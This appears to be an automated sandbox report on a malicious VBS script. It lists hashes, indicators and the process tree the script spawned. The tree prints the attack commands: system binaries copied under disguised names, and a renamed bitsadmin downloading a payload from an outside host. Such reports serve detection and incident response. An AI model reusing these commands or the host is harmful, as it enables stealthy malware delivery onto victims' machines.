79b59d0b510fb8855ee624fd51b46c2b4f1cccef9294860f9864f00183b07e2c

Analysis

Target

FattDiffEmessa2020 03799870369.vbs
Size

3KB
MD5

ba1697038db097aae963962a1fd5dd15
SHA1

46e3f1b7e3c93f3de52d63a1afb3b6f6c17180b8
SHA256

79b59d0b510fb8855ee624fd51b46c2b4f1cccef9294860f9864f00183b07e2c
SHA512

d45c7b86124b760381e36eeb301c2fba631e38b3ba537187ca059238eb2692531dda9efaa0ed0806c2530794b9fcd4f70e872ff6da2984d31ea812e6e177fb64

Score

8^/10

Suspicious use of WriteProcessMemory 14 IoCs

Processes:

WScript.exe

description	pid	process	target process
PID 1356 wrote to memory of 1444	1356	WScript.exe	cmd.exe
PID 1356 wrote to memory of 1444	1356	WScript.exe	cmd.exe
PID 1356 wrote to memory of 1444	1356	WScript.exe	cmd.exe
PID 1356 wrote to memory of 1000	1356	WScript.exe	cmd.exe
PID 1356 wrote to memory of 1000	1356	WScript.exe	cmd.exe
PID 1356 wrote to memory of 1000	1356	WScript.exe	cmd.exe
PID 1356 wrote to memory of 744	1356	WScript.exe	DrBqNtd.exe
PID 1356 wrote to memory of 744	1356	WScript.exe	DrBqNtd.exe
PID 1356 wrote to memory of 744	1356	WScript.exe	DrBqNtd.exe
PID 1356 wrote to memory of 744	1356	WScript.exe	DrBqNtd.exe
PID 1356 wrote to memory of 1780	1356	WScript.exe	pDrBqNtd.exe
PID 1356 wrote to memory of 1780	1356	WScript.exe	pDrBqNtd.exe
PID 1356 wrote to memory of 1780	1356	WScript.exe	pDrBqNtd.exe
PID 1356 wrote to memory of 1780	1356	WScript.exe	pDrBqNtd.exe

Executes dropped EXE 2 IoCs

Processes:

DrBqNtd.exepDrBqNtd.exe

pid process

744 DrBqNtd.exe
1780 pDrBqNtd.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

pDrBqNtd.exe

description pid process

Token: SeDebugPrivilege 1780 pDrBqNtd.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

pDrBqNtd.exe

pid process

1780 pDrBqNtd.exe
1780 pDrBqNtd.exe

pid	process
744	DrBqNtd.exe
1780	pDrBqNtd.exe

description	pid	process
Token: SeDebugPrivilege	1780	pDrBqNtd.exe

pid	process
1780	pDrBqNtd.exe
1780	pDrBqNtd.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FattDiffEmessa2020 03799870369.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1356

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\pDrBqNtd.exe
2⤵
PID:1444

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\DrBqNtd.exe
2⤵
PID:1000

C:\Users\Admin\AppData\Roaming\DrBqNtd.exe
"C:\Users\Admin\AppData\Roaming\DrBqNtd.exe" /transfer bHybPh /download https://ndjambo.com/jaluma/03799870369/it.gif C:\Users\Admin\AppData\Roaming\it.gif
2⤵
- Executes dropped EXE
PID:744

C:\Users\Admin\AppData\Roaming\DrBqNtd.exe

Download Submit
C:\Users\Admin\AppData\Roaming\DrBqNtd.exe

Download Submit
C:\Users\Admin\AppData\Roaming\pDrBqNtd.exe

Download Submit
C:\Users\Admin\AppData\Roaming\pDrBqNtd.exe

Download Submit
memory/744-3-0x0000000000000000-mapping.dmp

Download
memory/1000-1-0x0000000000000000-mapping.dmp

Download
memory/1356-10-0x00000000025D0000-0x00000000025D4000-memory.dmp

Filesize
16KB

Download
memory/1444-0-0x0000000000000000-mapping.dmp

Download
memory/1780-6-0x0000000000000000-mapping.dmp

Download